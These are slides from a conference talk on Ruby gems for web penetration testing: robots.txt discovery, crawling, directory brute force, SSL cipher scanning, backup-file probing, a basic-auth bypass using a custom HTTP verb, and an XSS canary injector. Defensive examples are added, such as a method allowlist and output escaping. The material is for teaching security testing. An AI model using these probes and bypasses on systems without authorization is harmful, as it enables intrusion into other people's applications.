Picking gem ruby for penetration testers

Notes:
  • Why choose Ruby? Mainly for its great networking API, which supports HTTP natively, and its powerful regular expression engine (>= 1.9). Yeah, it is cool too.
  • DISCLAIMER
  • Change your mindset
  • A small recap on application security. Focus will be on discovery, information gathering, SSL, XSS and SQL injections
  • Leverage your attack surface... what to look for?
  • robots.txt
  • robots.txt
  • links -r http://www.corriere.it
  • Crawling a website
  • ruby crawl.rb -1 http://localhost:8080/
  • Browsing with a transparent proxy
  • casper code highlight
  • ruby -I lib bin/casper "" 8008
  • bruteforcing using enchant
  • ruby -I lib bin/enchant localhost:8080
  • wapf... fingerprint using MD5 applied to static files common to frameworks
  • ciphersurfer and SSL testing
  • ciphersurfer highlight
  • ruby -I lib bin/ciphersurfer www.facebook.com
  • The importance of checking for backup files
  • ruby crawl.rb -2 http://localhost:8080/
  • Bypassing auth for an old PHP app protected with basic auth and with poor configuration
  • What XSS is
  • cross code highlight
  • again cross highlight
  • ruby -I lib bin/cross "http://localhost:8080/examples/xss_me.jsp"
  • what we learnt
  • links

Picking gem ruby for penetration testers

    1. picks and gems: ruby for penetration testers (@thesp0nge)
    2. self.inspect: https://github.com/thesp0nge, @thesp0nge, http://armoredcode.com
    3. Why ruby?
       • API (networking, string manipulation)
       • Net::HTTP
       • Coolness
    4. Disclaimer: Attack only sites you're authorized to
    5. What to test?

            class Developer
              # a bunch of great
              # methods here
            end

            class Developer
              include Person::Attacker
              # plenty of great
              # methods here
            end

       Change your mindset. You're an attacker now!
    6. What to test? Your app is a black box. You must gather information about it. You don't have credentials. Ooh look... a web form... (the same Developer / Person::Attacker snippet as slide 5 is shown again here)
       RubyDay IT, Milan, 15 June 2012
    7. Leverage your attack surface. "It's my web application. I don't even promote it. I have all the information about it, what are you talking about?"
       • Deep knowledge of the underlying technology
       • Spot attack entry points
       • Check transport layer security
       • Check for the service door
    8. Leverage your attack surface: robots.txt, to discover and to fingerprint
    9. Leverage your attack surface

            $ gem install links
            $ links -r http://www.yourtarget.com

       "Just a bunch of ruby loc away..."

            require 'net/http'

            # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001)
            # Class method from the links gem: fetch /robots.txt and return the
            # paths listed in Disallow (and, optionally, Allow) directives.
            def self.robots(site, only_disallow=true)
              if (! site.start_with? "http://") and (! site.start_with? "https://")
                site = "http://"+site
              end
              list = []
              begin
                res=Net::HTTP.get_response(URI(site+"/robots.txt"))
                if (res.code != "200")
                  return []
                end
                res.body.split("\n").each do |line|
                  # split on the first colon only, so "Disallow: http://..." keeps its value intact
                  if only_disallow
                    if (line.downcase.start_with?("disallow"))
                      list << line.split(":", 2)[1].strip.chomp
                    end
                  else
                    if (line.downcase.start_with?("allow") or line.downcase.start_with?("disallow"))
                      list << line.split(":", 2)[1].strip.chomp
                    end
                  end
                end
              rescue
                return []
              end
              list
            end
    10. Demo
    11. Search engines crawl your site; they are polite, you can ask them not to do it. Attackers crawl your site... they are not polite.

            $ gem install anemone

            require 'anemone'

            # Visit every page reachable from the start URL and print its address
            Anemone.crawl("http://www.target.com/") do |anemone|
              anemone.on_every_page do |page|
                puts page.url
              end
            end

    12. Demo
    13. Build a transparent proxy. Sometimes you need to observe the requests your browser makes while using a website... async calls are so sweet... Useful to check javascripts or urls called while manually browsing your target site.

            $ gem install casper
            $ casper

    14. Build a transparent proxy: extending WEBrick

            require 'webrick'
            require 'webrick/httpproxy'

            module Casper
              class Proxy < WEBrick::HTTPProxyServer
                attr_reader :req_count
                attr_reader :hosts

                def initialize(config={})
                  @req_count = 0
                  @hosts=[]
                  config[:Port] ||= 8080
                  config[:AccessLog] = []
                  # called for every proxied request/response pair
                  config[:ProxyContentHandler] = Proc.new do |req, res|
                    log_requests(req, res)
                  end
                  super(config)
                end

                private

                # Make the business: print the request line, remember the host, count it
                def log_requests(req, res)
                  $stdout.puts "[#{Time.now}] #{req.request_line.chomp}\n"
                  if @hosts.index(req.host).nil?
                    @hosts << req.host
                  end
                  inc_req_count
                end

                def inc_req_count
                  @req_count += 1
                end
              end
            end
    15. Demo
    16. enchant: brute force discovery. Very intrusive attack... discover web directories using brute force. You'll be busted.

            $ gem install enchant
            $ enchant http://www.yourtarget.com

    17. Demo
    18. Web application fingerprinting. Web servers answer the same HTTP request in different ways.

            GET / HTTP/1.0

        Apache:

            HTTP/1.1 200 OK
            Date: Sun, 15 Jun 2003 17:10:49 GMT
            Server: Apache/1.3.23
            Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
            ETag: 32417-c4-3e5d8a83
            Accept-Ranges: bytes
            Content-Length: 196
            Connection: close
            Content-Type: text/HTML

        Microsoft IIS:

            HTTP/1.1 200 OK
            Server: Microsoft-IIS/5.0
            Content-Location: http://iis.example.com/Default.htm
            Date: Fri, 01 Jan 1999 20:13:52 GMT
            Content-Type: text/HTML
            Accept-Ranges: bytes
            Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT
            ETag: W/e0d362a4c335be1:ae1
            Content-Length: 133

        http://code.google.com/p/webapplicationfingerprinter/
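Added example (not from the talk or the webapplicationfingerprinter project): the two responses above, embedded as constructed strings, run through a small Ruby fingerprinter that uses both signals the slide shows, the Server banner and the order in which headers are emitted. It also strips the banner to show that hiding it leaves the order intact, which is why banner obscurity alone buys little.

```ruby
# Constructed copies of the slide's two responses; header order is kept on purpose.
APACHE_RESPONSE = <<~RESP
  HTTP/1.1 200 OK
  Date: Sun, 15 Jun 2003 17:10:49 GMT
  Server: Apache/1.3.23
  Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT
  ETag: 32417-c4-3e5d8a83
  Accept-Ranges: bytes
  Content-Length: 196
  Connection: close
  Content-Type: text/HTML
RESP

IIS_RESPONSE = <<~RESP
  HTTP/1.1 200 OK
  Server: Microsoft-IIS/5.0
  Content-Location: http://iis.example.com/Default.htm
  Date: Fri, 01 Jan 1999 20:13:52 GMT
  Content-Type: text/HTML
  Accept-Ranges: bytes
  Last-Modified: Fri, 01 Jan 1999 20:13:52 GMT
  ETag: W/e0d362a4c335be1:ae1
  Content-Length: 133
RESP

# Drop the status line and return headers as an ordered list of [name, value].
def parse_headers(raw)
  raw.lines.map(&:chomp).drop(1).reject(&:empty?).map do |line|
    name, value = line.split(":", 2) # only the first colon separates name and value
    [name.strip, value.to_s.strip]
  end
end

# Header order survives banner removal: Apache emits Date first, IIS does not.
def order_hint(headers)
  names = headers.map(&:first)
  return "unknown" unless names.include?("Date")
  names.first == "Date" ? "Apache-like" : "IIS-like"
end

def fingerprint(raw)
  headers = parse_headers(raw)
  { banner: headers.assoc("Server")&.last, order_hint: order_hint(headers) }
end

# Simulate a server configured to hide its Server header.
def strip_banner(raw)
  raw.lines.reject { |l| l.start_with?("Server:") }.join
end
```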
    19. SSL Testing. Evaluate an SSL connection for:
        • protocols the server supports
        • cipher length
        • certificate key length

            $ gem install ciphersurfer
            $ ciphersurfer www.gmail.com
            Evaluating secure communication with www.gmail.com:443
            Overall evaluation : B (76.5)
            Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55)
            Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80)
            Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90)

    20. SSL Testing

            # Caller: try every protocol version and collect what the server accepted
            protocol_version.each do |version|
              s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version})
              s.go
              if (s.ok_ciphers.size != 0)
                supported_protocols << version
                cipher_bits = cipher_bits | s.ok_bits
                ciphers = ciphers | s.ok_ciphers
              end
            end

            # Ciphersurfer::Scanner#go: offer each cipher OpenSSL knows for this
            # protocol, one connection per cipher, and record the ones that worked
            def go
              context = OpenSSL::SSL::SSLContext.new(@proto)
              cipher_set = context.ciphers
              cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits|
                request = Net::HTTP.new(@host, @port)
                request.use_ssl = true
                request.verify_mode = OpenSSL::SSL::VERIFY_NONE
                request.ciphers = cipher_name
                begin
                  response = request.get("/")
                  @ok_bits << bits
                  @ok_ciphers << cipher_name
                rescue OpenSSL::SSL::SSLError => e
                  # Quietly discard SSLErrors, really I don't care if the cipher has
                  # not been accepted
                rescue
                  # Quietly discard all other errors... you must perform all error
                  # checks in the calling program
                end
              end
            end
    21. Demo
    22. Check for backup files. Crawl the web site and append file extensions to your GETs.

            require 'anemone'
            require 'httpclient'

            h = HTTPClient.new()
            Anemone.crawl(ARGV[0]) do |anemone|
              anemone.on_every_page do |page|
                response = h.get(page.url)
                puts "Original: #{page.url}: #{response.code}"
                # drop any ;jsessionid-style suffix before appending a backup extension
                base = page.url.to_s.split(";")[0]
                { "BAK" => ".bak", "OLD" => ".old", "~" => "~" }.each do |label, suffix|
                  response = h.get(base.concat(suffix))
                  puts "#{label}: #{base}: #{response.code}"
                end
              end
            end

    23. Demo
    24. Bypass. A case study for a PHP 5.3 application using basic auth: with a tampered HTTP verb you can access protected urls.

            require 'net/http'

            # Create a custom HTTP verb
            class Dammi < Net::HTTPRequest
              METHOD = "DAMMI"
              REQUEST_HAS_BODY = false
              RESPONSE_HAS_BODY = true
            end

            http = Net::HTTP.new("www.mytarget.nonexistent", 80)
            # Make the request
            r_a = http.request(Dammi.new("/backend/index.php"))
            puts r_a.body
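Added example, not from the talk: the same bypass modelled offline with a constructed Rack-style backend that only guards GET and POST, alongside a method allowlist middleware that closes it. The Rack call/env conventions are standard; the backend, its path and its credentials are made up for the test.

```ruby
# Methods this application actually serves; anything else is refused up front.
ALLOWED_METHODS = %w[GET HEAD POST].freeze

# Rack-style middleware: refuse unknown verbs before any auth logic runs.
class MethodAllowlist
  def initialize(app, allowed = ALLOWED_METHODS)
    @app = app
    @allowed = allowed
  end

  def call(env)
    verb = env["REQUEST_METHOD"].to_s.upcase
    return @app.call(env) if @allowed.include?(verb)
    [405, { "Content-Type" => "text/plain", "Allow" => @allowed.join(", ") },
     ["Method Not Allowed\n"]]
  end
end

# Constructed stand-in for the misconfigured backend: it demands credentials
# only for GET and POST, which is exactly the gap a made-up verb slips through.
BACKEND = lambda do |env|
  limited = %w[GET POST].include?(env["REQUEST_METHOD"])
  if limited && env["HTTP_AUTHORIZATION"].nil?
    [401, { "WWW-Authenticate" => 'Basic realm="backend"' }, [""]]
  else
    [200, { "Content-Type" => "text/html" }, ["secret backend page"]]
  end
end

# Drive an app with a minimal Rack env and return the status code.
def request_status(app, verb, authorized: false)
  env = { "REQUEST_METHOD" => verb, "PATH_INFO" => "/backend/index.php" }
  env["HTTP_AUTHORIZATION"] = "Basic dXNlcjpwYXNz" if authorized # constructed value
  app.call(env).first
end
```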
    25. Cross site scripting. Executing arbitrary javascript code at client side by submitting a crafted parameter on a web form.
    26. Cross site scripting

            $ gem install cross
            $ cross http://www.yourtarget.com

            require 'singleton'
            require 'logger'
            require 'mechanize'

            module Cross
              # Engine is the cross class using Mechanize to inject canary and check for
              # output
              class Engine
                include Singleton
                attr_reader :agent

                # Starts the engine
                def start
                  @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
                  @agent.user_agent_alias = 'Mac Safari'
                end

                # Fill every field of every form with the canary, submit, and look for
                # a script element whose body is the canary in the response
                def inject(url)
                  found = false
                  page = @agent.get(url)
                  page.forms.each do |f|
                    f.fields.each do |ff|
                      ff.value = "<script>alert('cross canary');</script>"
                    end
                    pp = @agent.submit(f)
                    scripts = pp.search("//script")
                    scripts.each do |sc|
                      if sc.children.text == "alert('cross canary');"
                        found = true
                      end
                    end
                  end
                  found
                end
              end
            end

    27. Cross site scripting

            #!/usr/bin/env ruby
            $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + '/../lib'))
            require 'mechanize'
            require 'ap'
            require 'logger'
            require 'cross'

            host = Cross::Host.new(ARGV[0])
            ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge"
            ap "target: " + host.host
            engine = Cross::Engine.instance
            engine.start
            if engine.inject(ARGV[0])
              ap "Canary found in output page. Suspected XSS"
            end

        It doesn't work with iframe apps :-(
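Added example, not from the cross gem or the talk: the canary check cross performs on slides 26 and 27, run offline against a constructed page builder that reflects a field verbatim and against its HTML-escaped fix, using only Ruby's CGI.escapeHTML and a plain scan of script elements in place of Mechanize and XPath.

```ruby
require 'cgi'

# Same canary string the cross engine injects into every form field.
CANARY = "<script>alert('cross canary');</script>"

# Constructed vulnerable handler: reflects the submitted value verbatim.
def render_unescaped(value)
  "<html><body><p>You searched for: #{value}</p></body></html>"
end

# Fixed handler: HTML-encodes the value, so < > ' " & cannot form markup.
def render_escaped(value)
  "<html><body><p>You searched for: #{CGI.escapeHTML(value)}</p></body></html>"
end

# The check cross does via //script, here with a regex over <script> elements:
# is there one whose body is exactly the canary payload?
def canary_executes?(html)
  html.scan(%r{<script>(.*?)</script>}m).flatten.any? do |body|
    body == "alert('cross canary');"
  end
end

# Push the canary through a page builder and classify the outcome.
def reflection_test(builder)
  canary_executes?(builder.call(CANARY)) ? :suspected_xss : :encoded
end
```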
    28. Demo
    29. What we learnt
        • Don't trust your users
        • "Security through obscurity" is EVIL
        • Testing for security issues is a mandatory step before deploy
        • HTTPS won't save you from XSS or SQL Injections
    30. Some links before we
        • http://armoredcode.com/blog/categories/pentest-with-ruby/
        • https://gist.github.com/2935464 (gist for the anemone crawling demo)
        • https://github.com/thesp0nge/links
        • https://github.com/thesp0nge/ciphersurfer
        • https://github.com/thesp0nge/enchant
        • https://github.com/thesp0nge/cross
        • http://www.owasp.org
        • http://ronin-ruby.github.com/
        • https://github.com/rapid7/metasploit-framework
    31. Questions?
    32. Thank you!
